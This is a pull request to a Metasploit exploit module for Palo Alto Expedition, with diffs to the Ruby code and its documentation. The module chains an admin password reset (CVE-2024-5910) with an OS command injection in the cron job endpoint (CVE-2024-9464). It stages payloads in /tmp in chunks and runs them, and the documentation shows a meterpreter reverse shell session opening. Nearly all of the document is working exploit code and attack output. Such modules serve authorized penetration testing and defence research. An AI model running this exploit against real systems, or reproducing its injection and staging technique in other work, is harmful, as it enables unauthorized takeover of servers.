### PR TITLE
Use a staging file to permit more payloads

### DIFF
--- a/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
+++ b/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
@@ -1,0 +1,76 @@
+## Vulnerable Application
+
+This module exploits two vulnerabilities in Palo Alto Expedition to obtain a remote shell. The first vulnerability, CVE-2024-5910, allows to
+reset the password of the admin user. The second vulnerability, CVE-2024-9464, is an authenticated OS command injection.
+
+When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will
+first try to reset the admin password and then perform the OS command injection. In a default installation, commands will get executed in
+the context of www-data.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool).
+
+Installation instructions are available [here]
+(https://live.paloaltonetworks.com/t5/expedition-articles/expedition-documentation/ta-p/215619?attachment-id=13781).
+
+**Successfully tested on**
+
+- Expedition v1.2.91 on Ubuntu Server 20.04.1.
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > msf6 > use exploit/linux/http/paloalto_expedition_rce 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/paloalto_expedition_rce) > set RHOSTS <IP>
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
+```
+
+You should get a meterpreter session in the context of `www-data`.
+
+## Options
+
+### USERNAME
+Username for authentication, if available.
+
+### PASSWORD
+Password for the associated user.
+
+
+## Scenarios
+
+Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using curl or wget as a fetch command, should result in an output
+similar to the following:
+
+```
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
+[+] Successfully authenticated
+[*] Version retrieved: 1.2.91
+[*] Vulnerable to CVE-2024-5910 and appears to be vulnerable to CVE-2024-9464.
+[+] The target appears to be vulnerable.
+[*] Adding a new cronjob...
+[*] Injecting OS command...
+[*] Sending stage (3045380 bytes) to 192.168.137.203
+[*] Meterpreter session 1 opened (192.168.137.204:4444 -> 192.168.137.203:49006) at 2024-10-13 19:30:10 -0400
+[*] cleanup file: /tmp/j
+[*] Check thy shell.
+
+meterpreter > sysinfo 
+Computer     : 192.168.137.203
+OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid 
+Server username: www-data
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
+++ b/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
@@ -7,6 +7,9 @@ When credentials are provided, this module will only exploit the second vulnerab
 first try to reset the admin password and then perform the OS command injection. In a default installation, commands will get executed in
 the context of www-data.
 
+Note: If no credentials are available, the module will attempt to reset the admin password. For this, the parameter RESET_ADMIN_PASSWD must
+explicitly be set to true.
+
 ## Testing
 
 The software can be obtained from
@@ -41,6 +44,11 @@ Username for authentication, if available.
 ### PASSWORD
 Password for the associated user.
 
+### RESET_ADMIN_PASSWD
+If the username and password are not specified, the module will attempt to reset the admin password to the default password `paloalto`. This
+is also done to authenticate and retrieve the exact version information, in case no credentials have been provided. As this alters the
+configuration of the target system, the `RESET_ADMIN_PASSWD` parameter serves as a safeguard that must explicility set to true before the
+reset endpoint is being invoked.
 
 ## Scenarios
 

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -39,6 +39,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
           'FETCH_WRITABLE_DIR' => '/tmp'
         },
+        'Payload' => {
+          'BadChars' => "\x3a\x3b\x26" # :;&
+        },
         'Platform' => %w[unix linux],
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
@@ -66,7 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [false, 'Username for authentication, if available', 'admin']),
         OptString.new('PASSWORD', [false, 'Password for the specified user', 'paloalto']),
         OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),
-        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false])
+        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false]),
+        OptString.new('WRITABLE_DIR', [ false, 'A writable directory to stage the command', '/tmp/' ]),
       ]
     )
   end
@@ -161,8 +165,33 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Appears
   end
 
+  def execute_command(cmd, name)
+    vprint_status("Running command: #{cmd}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\";#{cmd} #"
+      }
+    )
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+  end
+
   def exploit
     cmd = payload.encoded
+    cmd_chunks = cmd.scan(/.{1,30}/)
+    staging_file = datastore['WRITABLE_DIR'] + '/' + Rex::Text.rand_text_alpha(3..5)
 
     if !@reset && !(datastore['USERNAME'] && datastore['PASSWORD'])
       unless datastore['RESET_ADMIN_PASSWD']
@@ -212,102 +241,21 @@ class MetasploitModule < Msf::Exploit::Remote
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo Og==|base64 -d)') # ':' breaks the injection if used directly
-    cmds = cmd.split(';')
-    cmds.each do |c|
-      if c.length > 97
-        print_bad("Command: '#{c}' is too long. Length: #{c.length}. Try to shorten it to 97 or less characters.")
-      end
-    end
-
     name = Rex::Text.rand_text_alpha(4..8)
     vprint_status('Using random name: ' + name)
     print_status('Injecting OS command...')
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[0]} #"
-      }
-    )
+    # Stage the command in a file
+    redirector = '>'
+    cmd_chunks.each do |chunk|
+      write_chunk = "echo -n \"#{chunk}\" #{redirector} #{staging_file}"
+      execute_command(write_chunk, name)
+      redirector = '>>'
+      sleep 1
+    end
 
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[1]} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    dropper = datastore['FETCH_WRITABLE_DIR'] + '/' + datastore['FETCH_FILENAME']
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";rm #{dropper} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    # execute the command from the file
+    execute_command("cat #{staging_file} | sh &", name)
 
     print_status('Check thy shell.')
   end

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -35,16 +35,15 @@ class MetasploitModule < Msf::Exploit::Remote
           'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
           'FETCH_WRITABLE_DIR' => '/tmp'
         },
-        'Platform' => [ 'linux' ],
+        'Platform' => %w[unix linux],
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Linux Command',
             {
               'Arch' => [ ARCH_CMD ],
-              'Platform' => [ 'linux' ],
+              'Platform' => %w[unix linux]
               # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
-              'Type' => :unix_cmd
             }
           ]
         ],
@@ -102,13 +101,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
       )
 
-      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
+      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
 
       if res.code == 403
         return CheckCode::Safe
       end
 
-      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
+      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
 
       respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
       print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
@@ -128,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     data = res.get_json_document
-    version = data['msg']['Expedition']
+    version = data.dig('msg', 'Expedition')
 
     if version.nil?
       return CheckCode::Unknown
@@ -171,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games', which is used as an alternative way to get ':'
+    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo Og==|base64 -d)') # ':' breaks the injection if used directly
     cmds = cmd.split(';')
     cmds.each do |c|
       if c.length > 97

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -137,11 +137,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Version retrieved: ' + version)
 
     if Rex::Version.new(version) > Rex::Version.new('1.2.91')
-        return CheckCode::Safe
+      return CheckCode::Safe
     end
-    
+
     return CheckCode::Appears
-    
   end
 
   def exploit

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -65,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [false, 'Username for authentication, if available']),
         OptString.new('PASSWORD', [false, 'Password for the specified user']),
-        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/'])
+        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),
+        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false])
       ]
     )
   end
@@ -101,23 +102,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     unless datastore['USERNAME'] && datastore['PASSWORD']
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
-      )
+        unless  datastore['RESET_ADMIN_PASSWD']
+           print_bad("No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.")
+           return CheckCode::Unknown
+        end
 
-      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
-
-      if res.code == 403
-        return CheckCode::Safe
-      end
-
-      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
-
-      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
-      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
-      datastore['PASSWORD'] = respass
-      datastore['USERNAME'] = 'admin'
+        res = send_request_cgi(
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+          )
+    
+          return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
+    
+          if res.code == 403
+            return CheckCode::Safe
+          end
+    
+          return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+    
+          respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
+          print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+          datastore['PASSWORD'] = respass
+          datastore['USERNAME'] = 'admin'
     end
 
     begin

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -102,28 +102,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     unless datastore['USERNAME'] && datastore['PASSWORD']
-        unless  datastore['RESET_ADMIN_PASSWD']
-           print_bad("No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.")
-           return CheckCode::Unknown
-        end
+      unless datastore['RESET_ADMIN_PASSWD']
+        print_bad('No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.')
+        return CheckCode::Unknown
+      end
 
-        res = send_request_cgi(
-            'method' => 'POST',
-            'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
-          )
-    
-          return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
-    
-          if res.code == 403
-            return CheckCode::Safe
-          end
-    
-          return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
-    
-          respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
-          print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
-          datastore['PASSWORD'] = respass
-          datastore['USERNAME'] = 'admin'
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
+      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      datastore['PASSWORD'] = respass
+      datastore['USERNAME'] = 'admin'
     end
 
     begin

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -132,22 +132,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if version.nil?
       return CheckCode::Unknown
-    else
-      print_status('Version retrieved: ' + version)
     end
 
-    if Rex::Version.new(version) <= Rex::Version.new('1.2.95')
-      return CheckCode::Appears
-    else
-      return CheckCode::Safe
+    print_status('Version retrieved: ' + version)
+
+    if Rex::Version.new(version) > Rex::Version.new('1.2.91')
+        return CheckCode::Safe
     end
+    
+    return CheckCode::Appears
+    
   end
 
   def exploit
-    execute_command(payload.encoded)
-  end
+    cmd = payload.encoded
 
-  def execute_command(cmd)
     @xsrf_token_value ||= xsrf_token_value
 
     print_status('Adding a new cronjob...')

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -127,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
       @password = respass
       @username = 'admin'
+      @reset = true
     end
 
     begin
@@ -162,6 +163,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cmd = payload.encoded
+
+    if !@reset && !(datastore['USERNAME'] && datastore['PASSWORD'])
+      unless datastore['RESET_ADMIN_PASSWD']
+        fail_with(Failure::BadConfig, 'No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again..')
+      end
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      fail_with(Failure::Unreachable, 'Failed to receive a reply.') unless res
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      @password = respass
+      @username = 'admin'
+    end
 
     begin
       @xsrf_token_value = xsrf_token_value

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -63,8 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('USERNAME', [false, 'Username for authentication, if available']),
-        OptString.new('PASSWORD', [false, 'Password for the specified user']),
+        OptString.new('USERNAME', [false, 'Username for authentication, if available', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for the specified user', 'paloalto']),
         OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),
         OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false])
       ]
@@ -72,6 +72,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def xsrf_token_value
+    user = @username || datastore['USERNAME']
+    password = @password || datastore['PASSWORD']
+
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'bin/Auth.php'),
@@ -80,8 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'action' => 'get',
         'type' => 'login_users',
-        'user' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD']
+        'user' => user,
+        'password' => password
       }
     )
 
@@ -122,8 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
       print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
-      datastore['PASSWORD'] = respass
-      datastore['USERNAME'] = 'admin'
+      @password = respass
+      @username = 'admin'
     end
 
     begin

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, ACCOUNT_LOCKOUTS]
         }
       )
     )
@@ -81,9 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless res
-      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
-    end
+    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
 
     data = res.get_json_document
 
@@ -93,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     csrftoken = data['csrfToken']
     fail_with(Failure::UnexpectedReply, 'csrftoken not found.') unless csrftoken
-    vprint_status("csrftoken: #{csrftoken}")
+    vprint_status("Got csrftoken: #{csrftoken}")
     csrftoken
   end
 
@@ -104,9 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
       )
 
-      unless res
-        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
-      end
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
 
       if res.code == 403
         return CheckCode::Safe
@@ -114,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
 
-      respass = res.to_s.match(/'([^']+)'/)[1]
+      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
       print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
       datastore['PASSWORD'] = respass
       datastore['USERNAME'] = 'admin'
@@ -177,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    cmd = cmd.gsub('http://', '').gsub(':', '$(echo $PATH|cut -c16)')
+    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games', which is used as an alternative way to get ':'
     cmds = cmd.split(';')
     cmds.each do |c|
       if c.length > 97
@@ -204,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'name' => name,
         'cron_id' => 1,
         'recurrence' => 'Daily',
-        'start_time' => "\"; #{cmds[0]} ;"
+        'start_time' => "\";#{cmds[0]} #"
       }
     )
 
@@ -225,7 +221,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'name' => name,
         'cron_id' => 1,
         'recurrence' => 'Daily',
-        'start_time' => "\"; #{cmds[1]} ;"
+        'start_time' => "\";#{cmds[1]} #"
       }
     )
 
@@ -246,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'name' => name,
         'cron_id' => 1,
         'recurrence' => 'Daily',
-        'start_time' => "\"; #{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} ;"
+        'start_time' => "\";#{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} #"
       }
     )
 
@@ -268,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'name' => name,
         'cron_id' => 1,
         'recurrence' => 'Daily',
-        'start_time' => "\"; rm #{dropper} ;"
+        'start_time' => "\";rm #{dropper} #"
       }
     )
 

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -1,4 +1,8 @@
 class MetasploitModule < Msf::Exploit::Remote
+
+  class XsrfExceptionError < StandardError; end
+  class XsrfExceptionUnreachableError < XsrfExceptionError; end
+
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
@@ -80,16 +84,17 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
+    raise XsrfExceptionUnreachableError, 'Failed to receive a reply from the server.' unless res
 
     data = res.get_json_document
 
-    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['csrfToken']
+    raise XsrfExceptionUnreachableError, "Unexpected reply from the server: #{data}" unless data['csrfToken']
 
     print_good('Successfully authenticated')
 
     csrftoken = data['csrfToken']
-    fail_with(Failure::UnexpectedReply, 'csrftoken not found.') unless csrftoken
+    raise XsrfExceptionUnreachableError, 'csrftoken not found.' unless csrftoken
+
     vprint_status("Got csrftoken: #{csrftoken}")
     csrftoken
   end
@@ -115,7 +120,11 @@ class MetasploitModule < Msf::Exploit::Remote
       datastore['USERNAME'] = 'admin'
     end
 
-    @xsrf_token_value = xsrf_token_value
+    begin
+      @xsrf_token_value = xsrf_token_value
+    rescue XsrfException::Error
+      return CheckCode::Safe
+    end
 
     res = send_request_cgi(
       'method' => 'GET',
@@ -145,7 +154,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     cmd = payload.encoded
 
-    @xsrf_token_value ||= xsrf_token_value
+    begin
+      @xsrf_token_value = xsrf_token_value
+    rescue XsrfException::Error
+      return fail_with(Failure::Unreachable, 'Failed to receive XSRF token.')
+    end
 
     print_status('Adding a new cronjob...')
     res = send_request_cgi(

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -1,0 +1,279 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)',
+        'Description' => %q{
+          Obtain remote code execution in Palo Alto Expedition version 1.2.91 and below.
+          The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data.
+          When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley', # Discovery CVE-2024-9464 and PoC
+          'Enrique Castillo', # Discovery CVE-2024-9464
+          'Brian Hysell' # Discovery CVE-2024-5910
+        ],
+        'References' => [
+          [ 'URL', 'https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/'],
+          [ 'URL', 'https://security.paloaltonetworks.com/PAN-SA-2024-0010'],
+          [ 'URL', 'https://security.paloaltonetworks.com/CVE-2024-5910'],
+          [ 'CVE', '2024-5910'],
+          [ 'CVE', '2024-24809']
+        ],
+        'DisclosureDate' => '2024-10-09',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => 'True',
+          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username for authentication, if available']),
+        OptString.new('PASSWORD', [false, 'Password for the specified user']),
+        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/'])
+      ]
+    )
+  end
+
+  def xsrf_token_value
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/Auth.php'),
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'get',
+        'type' => 'login_users',
+        'user' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    data = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['csrfToken']
+
+    print_good('Successfully authenticated')
+
+    csrftoken = data['csrfToken']
+    fail_with(Failure::UnexpectedReply, 'csrftoken not found.') unless csrftoken
+    vprint_status("csrftoken: #{csrftoken}")
+    csrftoken
+  end
+
+  def check
+    unless datastore['USERNAME'] && datastore['PASSWORD']
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      unless res
+        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+      end
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
